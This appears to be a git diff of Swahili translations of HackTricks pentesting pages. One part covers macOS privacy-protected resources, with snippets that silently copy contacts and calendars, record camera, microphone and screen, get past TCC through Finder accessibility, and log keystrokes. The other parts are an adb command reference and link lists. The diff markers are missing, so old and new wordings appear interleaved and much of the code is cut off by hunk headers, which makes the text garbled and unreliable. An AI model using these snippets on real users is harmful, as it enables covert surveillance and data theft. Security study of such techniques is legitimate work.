Nakili `$HOME/Library/Application Support/AddressBook` hadi `/tmp/contacts`.
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -268,7 +254,6 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/Library/Application Support/AddressBook` hadi `/tmp/contacts`.
```bash
cp -r "$HOME/Library/Application Support/AddressBook" "/tmp/contacts"
```
@ -277,13 +262,12 @@ cp -r "$HOME/Library/Application Support/AddressBook" "/tmp/contacts"
### Kalenda
* **Haki**: `com.apple.security.personal-information.calendars`
* **Ruhusa**: `com.apple.security.personal-information.calendars`
* **TCC**: `kTCCServiceCalendar`
{% tabs %}
{% tab title="ObjectiveC" %}
Nakili `$HOME/Library/Calendars` hadi `/tmp/calendars`.
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -319,7 +303,6 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/Library/Calendars` hadi `/tmp/calendars`.
```bash
cp -r "$HOME/Library/Calendars" "/tmp/calendars"
```
@ -328,15 +311,12 @@ cp -r "$HOME/Library/Calendars" "/tmp/calendars"
### Kamera
* **Uwezo**: `com.apple.security.device.camera`
* **Ruhusa**: `com.apple.security.device.camera`
* **TCC**: `kTCCServiceCamera`
{% tabs %}
{% tab title="undefined" %}
Rekodi video ya sekunde 3 na iihifadhi kwenye **`/tmp/recording.mov`**
{% endtab %}
{% tab title="undefined" %}
{% tab title="ObjetiveC - Rekodi" %}
Rekodi video ya sekunde 3 na uhifadhi katika **`/tmp/recording.mov`**
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -414,9 +394,8 @@ fclose(stderr); // Close the file stream
```
{% endtab %}
{% tab title="ObjectiveC - Angalia" %}
Angalia ikiwa programu ina ufikiaji wa kamera.
{% tab title="ObjectiveC - Check" %}
Kagua ikiwa programu ina ufikiaji wa kamera.
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -449,23 +428,22 @@ fclose(stderr); // Close the file stream
{% endtab %}
{% tab title="Shell" %}
Chukua picha na kamera
Piga picha na kamera
{% endtab %}
```bash
ffmpeg -framerate 30 -f avfoundation -i "0" -frames:v 1 /tmp/capture.jpg
```
{% endtab %}
{% endtabs %}
### Kipaza sauti
### Microphone
* **Ruhusa**: **com.apple.security.device.audio-input**
* **Entitlement**: **com.apple.security.device.audio-input**
* **TCC**: `kTCCServiceMicrophone`
{% tabs %}
{% tab title="ObjetiveC - Rekodi" %}
Rekodi sauti ya sekunde 5 na uhifadhi kwenye `/tmp/recording.m4a`
{% tab title="ObjetiveC - Record" %}
Record 5s of audio na uhifadhi katika `/tmp/recording.m4a`
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -564,9 +542,8 @@ fclose(stderr); // Close the file stream
```
{% endtab %}
{% tab title="ObjectiveC - Angalia" %}
{% tab title="ObjectiveC - Check" %}
Angalia ikiwa programu ina ufikiaji wa kipaza sauti.
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -597,8 +574,7 @@ static void telegram(int argc, const char **argv) {
{% endtab %}
{% tab title="Shell" %}
Rekodi sauti ya sekunde 5 na uhifadhi kwenye `/tmp/recording.wav`
Rekodi sauti ya sekunde 5 na uhifadhi katika `/tmp/recording.wav`
```bash
# Check the microphones
ffmpeg -f avfoundation -list_devices true -i ""
@ -611,16 +587,15 @@ ffmpeg -f avfoundation -i ":1" -t 5 /tmp/recording.wav
### Mahali
{% hint style="success" %}
Ili programu ipate mahali, **Huduma za Mahali** (kutoka kwa Faragha na Usalama) **lazima ziwezeshwe,** vinginevyo haitaweza kufikia hiyo.
Ili programu iweze kupata mahali, **Huduma za Mahali** (kutoka kwa Faragha na Usalama) **lazima ziwe zimeshawekwa,** vinginevyo haitoweza kuzipata.
{% endhint %}
* **Haki**: `com.apple.security.personal-information.location`
* **TCC**: Imeidhinishwa katika `/var/db/locationd/clients.plist`
* **Ruhusa**: `com.apple.security.personal-information.location`
* **TCC**: Imepewa katika `/var/db/locationd/clients.plist`
{% tabs %}
{% tab title="ObjectiveC" %}
Andika mahali katika `/tmp/logs.txt`
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -670,8 +645,7 @@ freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
{% endtab %}
{% tab title="Shell" %}
Pata ufikiaji wa eneo hilo
Pata ufikiaji wa eneo
```
???
```
@ -686,7 +660,6 @@ Pata ufikiaji wa eneo hilo
{% tabs %}
{% tab title="ObjectiveC" %}
Rekodi skrini kuu kwa sekunde 5 katika `/tmp/screen.mov`
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -744,7 +717,7 @@ freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
{% tab title="Shell" %}
Rekodi skrini kuu kwa sekunde 5
{% endtab %}
```bash
screencapture -V 5 /tmp/screen.mov
```
@ -756,8 +729,10 @@ screencapture -V 5 /tmp/screen.mov
* **Haki**: Hakuna
* **TCC**: `kTCCServiceAccessibility`
Tumia haki ya TCC kukubali udhibiti wa Finder kwa kubonyeza enter na kuepuka TCC kwa njia hiyo.
Tumia haki ya TCC kukubali udhibiti wa Finder kwa kubonyeza enter na kupita TCC kwa njia hiyo
{% tabs %}
{% tab title="Kubaliana na TCC" %}
```objectivec
#import <Foundation/Foundation.h>
#import <ApplicationServices/ApplicationServices.h>
@ -808,9 +783,10 @@ usleep(100000); // 0.1 seconds
return 0;
}
```
{% endtab %}
Hifadhi funguo zilizopigwa kwenye **`/tmp/keystrokes.txt`**
{% tab title="Keylogger" %}
Hifadhi funguo zilizobonyeza katika **`/tmp/keystrokes.txt`**
```objectivec
#import <Foundation/Foundation.h>
#import <ApplicationServices/ApplicationServices.h>
@ -914,21 +890,24 @@ CFRunLoopRun();
return 0;
}
```
{% endtab %}
{% endtabs %}
{% hint style="danger" %}
**Uwezo wa Ufikiaji ni idhini yenye nguvu sana**, unaweza kuitumia vibaya kwa njia nyingine, kwa mfano unaweza kufanya shambulio la **keystrokes** kutoka hapo bila haja ya kuita Matukio ya Mfumo.
**Upatikanaji ni ruhusa yenye nguvu sana**, unaweza kuitumia vibaya kwa njia nyingine, kwa mfano unaweza kufanya **shambulio la funguo** moja kwa moja kutoka hapo bila kuhitaji kuita Matukio ya Mfumo.
{% endhint %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

34
misc/references.md
View file

@ -1,16 +1,17 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %}
@ -60,16 +61,17 @@ Njia nyingine za kusaidia HackTricks:
{% embed url="https://ippsec.rocks/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

143
mobile-pentesting/android-app-pentesting/adb-commands.md
View file

@ -1,19 +1,20 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
**Adb kawaida iko katika:**
**Adb kwa kawaida hupatikana katika:**
```bash
#Windows
C:\Users\<username>\AppData\Local\Android\sdk\platform-tools\adb.exe
@ -21,31 +22,31 @@ C:\Users\<username>\AppData\Local\Android\sdk\platform-tools\adb.exe
#MacOS
/Users/<username>/Library/Android/sdk/platform-tools/adb
```
**Maelezo yaliyopatikana kutoka:** [**http://adbshell.com/**](http://adbshell.com)
**Taarifa zilizopatikana kutoka:** [**http://adbshell.com/**](http://adbshell.com)
# Uunganisho
# Muunganisho
```
adb devices
```
Hii itaorodhesha vifaa vilivyounganishwa; ikiwa "_**unathorised**_" inaonekana, hii inamaanisha kuwa unahitaji **kuondoa kizuizi** kwenye **simu yako** na **kukubali** uunganisho.
Hii itataja vifaa vilivyounganishwa; ikiwa "_**isiyothibitishwa**_" inaonekana, hii inamaanisha kwamba unapaswa **kuondoa kizuizi** kwenye **simu** yako na **kukubali** muunganisho.
Hii inaashiria kifaa kuwa kinapaswa kuanza adb server kwenye bandari 5555:
Hii inaashiria kwa kifaa kwamba kinapaswa kuanzisha na adb server kwenye bandari 5555:
```
adb tcpip 5555
```
Weka uhusiano na anwani hiyo ya IP na hiyo Port:
Unganisha kwenye IP hiyo na Bandari hiyo:
```
adb connect <IP>:<PORT>
```
Ikiwa unapata kosa kama ifuatavyo katika programu ya Android ya Virtual (kama Genymotion):
Ikiwa unapata kosa kama ifuatavyo katika programu ya Virtual Android (kama Genymotion):
```
adb server version (41) doesn't match this client (36); killing...
```
Ni kwa sababu unajaribu kuunganisha kwenye seva ya ADB na toleo tofauti. Jaribu tu kupata faili ya adb binary ambayo programu inatumia (enda kwenye `C:\Program Files\Genymobile\Genymotion` na tafuta adb.exe)
Ni kwa sababu unajaribu kuungana na seva ya ADB yenye toleo tofauti. Jaribu tu kutafuta binary ya adb ambayo programu inatumia (nenda kwenye `C:\Program Files\Genymobile\Genymotion` na tafuta adb.exe)
## Vifaa vingi
Unapopata **vifaa vingi vilivyounganishwa kwenye kompyuta yako**, utahitaji **kutaja kwenye kifaa kipi** unataka kuendesha amri ya adb.
Wakati wowote unapata **vifaa vingi vimeunganishwa kwenye mashine yako** utahitaji **kueleza ni kipi** unachotaka kutumia kuendesha amri ya adb.
```bash
adb devices
List of devices attached
@ -60,16 +61,16 @@ root
```
## Port Tunneling
Katika kesi ambapo **adb** **port** inaweza kufikiwa tu kutoka **localhost** kwenye kifaa cha Android lakini **una ufikiaji kupitia SSH**, unaweza **kuhamisha** **port 5555** na kuunganisha kupitia adb:
Ikiwa **adb** **bandari** inapatikana tu kutoka **localhost** kwenye kifaa cha android lakini **una ufikiaji kupitia SSH**, unaweza **kupeleka bandari 5555** na kuungana kupitia adb:
```bash
ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222
adb connect 127.0.0.1:5555
```
# Meneja wa Pakiti
# Packet Manager
## Sakinisha/Ondoa
## Install/Uninstall
### adb install \[chaguo] \<njia>
### adb install \[option] \<path>
```bash
adb install test.apk
@ -85,23 +86,17 @@ adb install -d test.apk # allow version code downgrade
adb install -p test.apk # partial application install
```
### adb uninstall \[chaguo] \<PAKETI>
- **Maelezo**: Amri hii inatumika kuondoa programu ya Android kutoka kifaa cha lengo.
- **Chaguo**:
- `-k`: Ongeza chaguo hili ili kuweka data na hifadhidata ya programu baada ya kuiondoa.
- `-r`: Ongeza chaguo hili ili kuondoa programu ya mfumo ambayo imesakinishwa kwenye kifaa cha lengo.
- **Mfano**: `adb uninstall com.example.app`
### adb uninstall \[options] \<PACKAGE>
```bash
adb uninstall com.test.app
adb uninstall -k com.test.app Keep the data and cache directories around after package removal.
```
## Pakiti
## Packages
Inaonyesha pakiti zote, kwa hiari tu zile ambazo jina la pakiti linajumuisha maandishi katika \<FILTER>.
Inachapisha pakiti zote, kwa hiari zile tu ambazo jina la pakiti lina maandiko katika \<FILTER>.
### adb shell pm list packages \[chaguo] \<FILTER-STR>
### adb shell pm list packages \[options] \<FILTER-STR>
```bash
adb shell pm list packages <FILTER-STR>
@ -123,41 +118,41 @@ adb shell pm list packages --user <USER_ID> <FILTER-STR> #The user space to quer
```
### adb shell pm path \<PACKAGE>
Chapisha njia ya APK ya .
Chapisha njia ya APK ya iliyotolewa.
```bash
adb shell pm path com.android.phone
```
### adb shell pm clear \<PACKAGE>
Futa data zote zinazohusiana na pakiti.
Futa data zote zinazohusiana na kifurushi.
```bash
adb shell pm clear com.test.abc
```
# Meneja wa Faili
# File Manager
### adb pull \<remote> \[local]
Pakua faili iliyotajwa kutoka kwenye kifaa/emulator hadi kwenye kompyuta yako.
Pakua faili maalum kutoka kwa emulator/kifaa hadi kwenye kompyuta yako.
```bash
adb pull /sdcard/demo.mp4 ./
```
### adb push \<local> \<remote>
Pakia faili iliyotajwa kutoka kwenye kompyuta yako kwenda kwenye kifaa/emulator.
Pakia faili maalum kutoka kwa kompyuta yako hadi emulators/kipande.
```bash
adb push test.apk /sdcard
```
# Kuchukua Picha ya Skrini/Rekodi ya Skrini
# Screencapture/Screenrecord
### adb shell screencap \<jina la faili>
### adb shell screencap \<filename>
Kuchukua picha ya skrini ya kifaa.
Kuchukua picha ya skrini ya onyesho la kifaa.
```bash
adb shell screencap /sdcard/screen.png
```
### adb shell screenrecord \[chaguo] \<jina la faili>
### adb shell screenrecord \[options] \<filename>
Kurekodi skrini ya vifaa vinavyotumia Android 4.4 (kiwango cha API 19) na zaidi.
Kurekodi onyesho la vifaa vinavyotumia Android 4.4 (API level 19) na juu.
```bash
adb shell screenrecord /sdcard/demo.mp4
adb shell screenrecord --size <WIDTHxHEIGHT>
@ -174,7 +169,7 @@ adb shell screenrecord --verbose
### adb shell
Pata kikao ndani ya kifaa
Pata shell ndani ya kifaa
```bash
adb shell
```
@ -186,7 +181,7 @@ adb shell ls
```
## pm
Amri zifuatazo zinatekelezwa ndani ya kikao cha shell
Amri zifuatazo zinafanywa ndani ya shell
```bash
pm list packages #List installed packages
pm path <package name> #Get the path to the apk file of tha package
@ -195,9 +190,9 @@ am startservice [<options>] #Start a service. Whiout options you can see the hel
am broadcast [<options>] #Send a broadcast. Whiout options you can see the help menu
input [text|keyevent] #Send keystrokes to device
```
# Mchakato
# Processes
Ikiwa unataka kupata PID ya mchakato wa programu yako, unaweza kutekeleza:
Ikiwa unataka kupata PID ya mchakato wa programu yako unaweza kutekeleza:
```bash
adb shell ps
```
@ -207,37 +202,32 @@ Au unaweza kufanya
```bash
adb shell pidof com.your.application
```
Na itaandika PID ya programu
Na itachapisha PID ya programu
# System
```bash
adb root
```
Hii inaanza tena adbd daemon na ruhusa ya root. Kisha, lazima uunganishe tena kwenye seva ya ADB na utakuwa na ruhusa ya root (ikiwa inapatikana).
Inarestart huduma ya adbd na ruhusa za mzizi. Kisha, unapaswa kuungana tena na seva ya ADB na utakuwa mzizi (ikiwa inapatikana)
```bash
adb sideload <update.zip>
```
# Kurejesha/kuweka upya pakiti za Android update.zip.
flashing/restoring Android update.zip packages.
# Kumbukumbu
# Logs
## Logcat
Kwa **kuchuja ujumbe wa programu moja tu**, pata PID ya programu na tumia grep (linux/macos) au findstr (windows) kuchuja matokeo ya logcat:
Ili **kuchuja ujumbe wa programu moja tu**, pata PID ya programu na tumia grep (linux/macos) au findstr (windows) kuchuja matokeo ya logcat:
```bash
adb logcat | grep 4526
adb logcat | findstr 4526
```
### adb logcat \[chaguo] \[majaribio-ya-kichujio]
- **chaguo**: Chaguo-msingi cha adb logcat ni *main*. Chaguo zingine ni *radio*, *events*, *system*, *crash*, *kernel*, *all*.
- **majaribio-ya-kichujio**: Unaweza kutumia majaribio ya kichujio ili kuchuja matokeo ya logcat kulingana na vigezo fulani kama *tag*, *priority*, *pid*, *appname*, *message*.
Kwa mfano, unaweza kutumia amri `adb logcat -d | grep "Error"` ili kupata makosa kutoka kwenye logcat.
### adb logcat \[option] \[filter-specs]
```bash
adb logcat
```
Maelezo: bonyeza Ctrl-C ili kusimamisha ufuatiliaji
Notes: bonyeza Ctrl-C kuacha kufuatilia
```bash
adb logcat *:V # lowest priority, filter to only show Verbose level
@ -254,16 +244,6 @@ adb logcat *:F # filter to only show Fatal level
adb logcat *:S # Silent, highest priority, on which nothing is ever printed
```
### adb logcat -b \<Buffer>
Kwa kutumia amri hii, unaweza kusoma na kuchambua magogo ya kifaa cha Android kwa kikundi maalum cha kumbukumbu. Badala ya `<Buffer>`, unaweza kutumia vikundi vifuatavyo:
- `main`: Kumbukumbu kuu ya mfumo wa Android.
- `radio`: Kumbukumbu ya mawasiliano ya simu.
- `events`: Kumbukumbu ya matukio ya mfumo.
- `system`: Kumbukumbu ya magogo ya mfumo.
- `crash`: Kumbukumbu ya magogo ya ajali.
Kwa mfano, unaweza kutumia amri `adb logcat -b main` ili kusoma magogo ya kumbukumbu kuu ya mfumo wa Android.
```bash
adb logcat -b # radio View the buffer that contains radio/telephony related messages.
@ -283,9 +263,9 @@ adb logcat -n <count> # Sets the maximum number of rotated logs to <count>.
```
## dumpsys
Inahifadhi data ya mfumo
dumps data za mfumo
### adb shell dumpsys \[chaguo]
### adb shell dumpsys \[options]
```bash
adb shell dumpsys
@ -293,11 +273,11 @@ adb shell dumpsys meminfo
adb shell dumpsys battery
```
Maelezo: Kifaa cha simu kilicho na Chaguo za Watengenezaji zilizowezeshwa kinachotumia Android 5.0 au zaidi.
Notes: Kifaa cha simu chenye Chaguo za Mwandamizi kimewezeshwa kinachotumia Android 5.0 au juu.
```bash
adb shell dumpsys batterystats collects battery data from your device
```
Maelezo: [Battery Historian](https://github.com/google/battery-historian) hubadilisha data hiyo kuwa taswira ya HTML. **HATUA 1** _adb shell dumpsys batterystats > batterystats.txt_ **HATUA 2** _python historian.py batterystats.txt > batterystats.html_
Notes: [Battery Historian](https://github.com/google/battery-historian) inabadilisha data hiyo kuwa uonyeshaji wa HTML. **STEP 1** _adb shell dumpsys batterystats > batterystats.txt_ **STEP 2** _python historian.py batterystats.txt > batterystats.html_
```bash
adb shell dumpsys batterystats --reset erases old collection data
```
@ -305,7 +285,7 @@ adb shell dumpsys activity
# Backup
Hifadhi kifaa cha Android kutoka kwa adb.
Fanya nakala ya kifaa cha android kutoka adb.
```bash
adb backup [-apk] [-shared] [-system] [-all] -f file.backup
# -apk -- Include APK from Third partie's applications
@ -317,20 +297,21 @@ adb shell pm list packages -f -3 #List packages
adb backup -f myapp_backup.ab -apk com.myapp # backup on one device
adb restore myapp_backup.ab # restore to the same or any other device
```
Ikiwa unataka kukagua maudhui ya nakala rudufu:
Ikiwa unataka kukagua maudhui ya nakala:
```bash
( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 myapp_backup.ab ) | tar xfvz -
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

315
mobile-pentesting/android-app-pentesting/android-applications-basics.md
View file

@ -1,20 +1,21 @@
# Misingi ya Maombi ya Android
# Msingi wa Maombi ya Android
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
